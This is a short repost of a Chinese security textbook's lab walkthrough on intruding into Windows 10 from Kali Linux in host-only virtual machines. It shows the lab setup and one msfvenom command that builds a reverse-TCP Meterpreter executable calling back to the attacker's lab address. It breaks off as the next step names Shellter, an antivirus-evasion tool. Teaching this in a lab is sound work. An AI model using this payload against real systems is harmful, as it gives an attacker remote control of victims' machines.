資訊保安技術實用教程-第4版---張同光---ISBN-9787121423031---4.4例項——入侵Windows10
阿新 • • 發佈:2021-11-27
資訊保安技術實用教程-第4版---張同光---ISBN-9787121423031---4.4例項——入侵Windows10
https://www.cnblogs.com/ztguang/p/12828764.html
主 編: 張同光
ISBN號: 978-7-121-42303-1 9787121423031
出版日期: 2021-11-20
出版社: 電子工業出版社
頁碼: 定價:¥69.80元
4.4例項——入侵Windows10
1.實驗環境
實驗環境如圖4.1所示,使用2個虛擬機器(Windows10_1703_x86_en、KaliLinux)和宿主機(Windows 10),2個虛擬機器的網路連線方式選擇“僅主機(Host-
圖4.1實驗環境
圖4.2三個系統的IP地址及其之間的網路連通性
2.入侵過程
第1步:執行msfvenom命令
如圖4.3所示,在Kali Linux終端視窗中執行如下命令:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.56.101 LPORT=4444 -o /root/kali2win10.exe
上面msfvenom命令生成32位Windows可執行檔案(kali2win10.exe),該檔案實現反向TCP連線,必須指定為.exe型別,並且必須定義本地主機(LHOST)和本地埠(LPORT)。該例項中,LHOST是攻擊機的IP地址,LPORT是一個埠,一旦目標機受到攻擊,它就會監聽目標機的連線。
圖4.3執行msfvenom命令
第2步:下載並執行Shellter